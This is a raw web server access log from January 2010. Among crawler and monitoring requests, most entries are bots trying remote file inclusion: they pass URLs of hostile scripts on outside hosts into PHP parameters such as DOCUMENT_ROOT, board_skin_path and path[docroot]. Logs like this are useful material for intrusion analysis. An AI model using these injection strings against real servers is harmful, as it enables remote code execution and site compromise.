38.99.120.74 - - [17/Jan/2010:00:00:25 -0500] "GET //?_zb_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:00:00:28 -0500] "GET /logs//?_zb_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:00:00:29 -0500] "GET /logs/access_log.Q109101700//?_zb_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
71.184.185.136 - - [17/Jan/2010:00:01:07 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3204F35C36149900992008L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
209.59.12.99 - - [17/Jan/2010:00:01:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.37.174 - - [17/Jan/2010:00:02:52 -0500] "GET /images/items/EcOm/ HTTP/1.0" 200 2245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.69.210.92 - - [17/Jan/2010:00:03:05 -0500] "GET /logs/error_log.Q109061100/xmlrpc.php? HTTP/1.1" 404 234 "-" "libwww-perl/5.73"
95.108.128.242 - - [17/Jan/2010:00:04:02 -0500] "GET /logs/error_log.Q109061500 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
212.175.5.130 - - [17/Jan/2010:00:05:37 -0500] "GET /logs/error_log.Q109080400%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:05:37 -0500] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:05:37 -0500] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:05:50 -0500] "GET /logs/error_log.Q109060300%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:08:53 -0500] "GET /logs/phphtml.php?htmlclass_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:08:53 -0500] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:08:53 -0500] "GET /phphtml.php?htmlclass_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:08:53 -0500] "GET /logs/access_log.Q109101700/phphtml.php?htmlclass_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.68.41 - - [17/Jan/2010:00:09:34 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L016A1B5D64027200496D038+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.199.105 - - [17/Jan/2010:00:09:42 -0500] "GET /logs/error_log.Q109092700//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:11:23 -0500] "GET /logs/error_log.Q109080400//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:11:24 -0500] "GET /logs/error_log.Q109060300//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:00:12:03 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:00:12:03 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:00:12:12 -0500] "GET /logs/access_log.Q109110100%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:00:12:13 -0500] "GET //index.php?DOCUMENT_ROOT=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:00:12:13 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:00:12:13 -0500] "GET /logs/access_log.Q109110100%20%20//index.php?DOCUMENT_ROOT=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:00:14:44 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
189.72.28.14 - - [17/Jan/2010:00:15:45 -0500] "GET /logs/access_log.Q109101700%20%20/phphtml.php?htmlclass_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:15:45 -0500] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
95.108.128.242 - - [17/Jan/2010:00:18:37 -0500] "GET /logs/access_log.Q109060600 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
222.122.45.62 - - [17/Jan/2010:00:18:40 -0500] "GET ///write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.122.45.62 - - [17/Jan/2010:00:18:40 -0500] "GET /logs///write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.45.62 - - [17/Jan/2010:00:18:41 -0500] "GET ///write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.122.45.62 - - [17/Jan/2010:00:18:44 -0500] "GET /logs/access_log.Q109080600///write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.45.62 - - [17/Jan/2010:00:18:45 -0500] "GET /logs///write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.45.62 - - [17/Jan/2010:00:18:45 -0500] "GET /logs/access_log.Q109080600///write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.45.62 - - [17/Jan/2010:00:19:07 -0500] "GET /logs/access_log.Q109082000///write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.45.62 - - [17/Jan/2010:00:19:15 -0500] "GET /logs/access_log.Q109082000///write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:00:19:56 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:00:19:56 -0500] "GET /logs/access_log.Q109060900%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:00:19:56 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:00:21:50 -0500] "GET /logs/access_log.Q109103000%20%20/admin/business_inc/saveserver.php?thisdir=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:00:21:50 -0500] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:00:21:50 -0500] "GET /admin/business_inc/saveserver.php?thisdir=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:00:21:50 -0500] "GET /logs/access_log.Q109072600%20%20/admin/business_inc/saveserver.php?thisdir=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:00:21:56 -0500] "GET /logs/access_log.Q109072600%20%20/admin/business_inc/saveserver.php?thisdir=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:00:21:56 -0500] "GET /logs/access_log.Q109103000%20%20/admin/business_inc/saveserver.php?thisdir=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:00:21:56 -0500] "GET /admin/business_inc/saveserver.php?thisdir=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.253.25.15 - - [17/Jan/2010:00:21:56 -0500] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:22:04 -0500] "GET /logs//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:22:04 -0500] "GET //antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:22:04 -0500] "GET /logs/access_log.Q109120800//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:22:10 -0500] "GET //antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:22:12 -0500] "GET /logs//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:22:15 -0500] "GET /logs/access_log.Q109120800//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
66.249.68.142 - - [17/Jan/2010:00:23:41 -0500] "GET /images/index_bone_over.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.92.156.53 - - [17/Jan/2010:00:23:52 -0500] "GET /logs/access_log.Q109110100//s_loadenv.inc.php?DOCUMENT_ROOT=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:23:52 -0500] "GET /logs/access_log.Q109071100//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:23:58 -0500] "GET /logs/access_log.Q109071100//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:00:24:59 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
189.72.28.14 - - [17/Jan/2010:00:25:30 -0500] "GET //antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:25:30 -0500] "GET /logs//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:25:55 -0500] "GET /logs/access_log.Q109051800//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:00:26:27 -0500] "GET /logs/access_log.Q109110100//index.php?DOCUMENT_ROOT=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:26:37 -0500] "GET /logs//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:26:37 -0500] "GET //antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:27:14 -0500] "GET /logs/access_log.Q109051800//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:00:29:41 -0500] "GET /logs/error_log.Q109110700 HTTP/1.0" 200 3527056 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [17/Jan/2010:00:29:58 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.175.5.130 - - [17/Jan/2010:00:30:10 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:30:10 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:30:10 -0500] "GET /logs/access_log.Q109101000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:00:29:42 -0500] "GET /logs/error_log.Q109110700 HTTP/1.0" 200 3527056 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.175.5.130 - - [17/Jan/2010:00:30:22 -0500] "GET /logs/access_log.Q109101200%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:30:24 -0500] "GET /logs//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:30:24 -0500] "GET //antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
65.60.44.202 - - [17/Jan/2010:00:30:57 -0500] "GET /logs//delete_all.php?board_skin_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 218 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.60.44.202 - - [17/Jan/2010:00:30:57 -0500] "GET //delete_all.php?board_skin_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
189.72.28.14 - - [17/Jan/2010:00:31:06 -0500] "GET //antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:31:06 -0500] "GET /logs//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:00:31:08 -0500] "GET /logs/access_log.Q109051800%20%20//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
220.181.7.122 - - [17/Jan/2010:00:31:17 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
189.72.28.14 - - [17/Jan/2010:00:31:23 -0500] "GET /logs/access_log.Q109051800%20%20//antigo/teste//pollphp/textfile//admin/common.inc.php?base_path=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:00:31:43 -0500] "GET /logs/error_log.Q109090200 HTTP/1.0" 200 2880120 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.174 - - [17/Jan/2010:00:31:43 -0500] "GET /logs/error_log.Q109090200 HTTP/1.0" 200 2880120 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.175.5.130 - - [17/Jan/2010:00:33:46 -0500] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:33:46 -0500] "GET //?path%5Bdocroot%5D=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:33:46 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:00:33:49 -0500] "GET //?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:00:33:49 -0500] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:00:33:50 -0500] "GET /logs//?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:00:33:51 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:00:33:52 -0500] "GET //?path%5Bdocroot%5D=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:00:33:52 -0500] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
95.108.128.242 - - [17/Jan/2010:00:33:11 -0500] "GET /logs/error_log.Q110011000 HTTP/1.1" 200 4336809 "-" "Yandex/1.01.001 (compatible; Win16; I)"
69.16.230.82 - - [17/Jan/2010:00:34:17 -0500] "GET //?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:34:17 -0500] "GET /logs//?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:34:17 -0500] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:34:19 -0500] "GET //?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:34:19 -0500] "GET /logs//?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:34:19 -0500] "GET /logs/access_log.Q109072900%20%20//?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.125.66.67 - - [17/Jan/2010:00:34:58 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [17/Jan/2010:00:35:00 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
188.93.208.12 - - [17/Jan/2010:00:35:40 -0500] "GET /logs/access_log.Q109121600//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:00:35:40 -0500] "GET /logs/access_log.Q109120600//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:00:35:40 -0500] "GET //admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:00:35:40 -0500] "GET /logs//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:35:41 -0500] "GET /logs//admin/classes/errors.php?error=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:35:41 -0500] "GET //admin/classes/errors.php?error=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:35:41 -0500] "GET /logs/access_log.Q109121600//admin/classes/errors.php?error=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:00:35:41 -0500] "GET /logs/access_log.Q109120600//admin/classes/errors.php?error=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:36:11 -0500] "GET //admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:36:11 -0500] "GET /logs/access_log.Q109121600%20%20//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:36:12 -0500] "GET /logs//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:36:14 -0500] "GET /logs/access_log.Q109120600%20%20//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:00:36:17 -0500] "GET //admin/classes/errors.php?error=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:00:36:17 -0500] "GET /logs/access_log.Q109121600//admin/classes/errors.php?error=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:00:36:17 -0500] "GET /logs/access_log.Q109120600//admin/classes/errors.php?error=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:00:36:17 -0500] "GET /logs//admin/classes/errors.php?error=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:00:36:22 -0500] "GET //?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:00:36:22 -0500] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:00:36:22 -0500] "GET /logs//?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:00:36:26 -0500] "GET /logs/access_log.Q109071400//?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.249.68.142 - - [17/Jan/2010:00:36:41 -0500] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L016A1B5D68E28200432D038+WSEQ(S0060):1+OUITEM(A0200):45415201 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.16.230.82 - - [17/Jan/2010:00:36:50 -0500] "GET //admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:36:50 -0500] "GET /logs//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:36:51 -0500] "GET /logs/error_log.Q109052200//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:36:52 -0500] "GET /logs/error_log.Q109070400//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:37:01 -0500] "GET //admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:37:01 -0500] "GET /logs//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:37:01 -0500] "GET /logs/access_log.Q109121600//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:00:37:01 -0500] "GET /logs/access_log.Q109120600//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
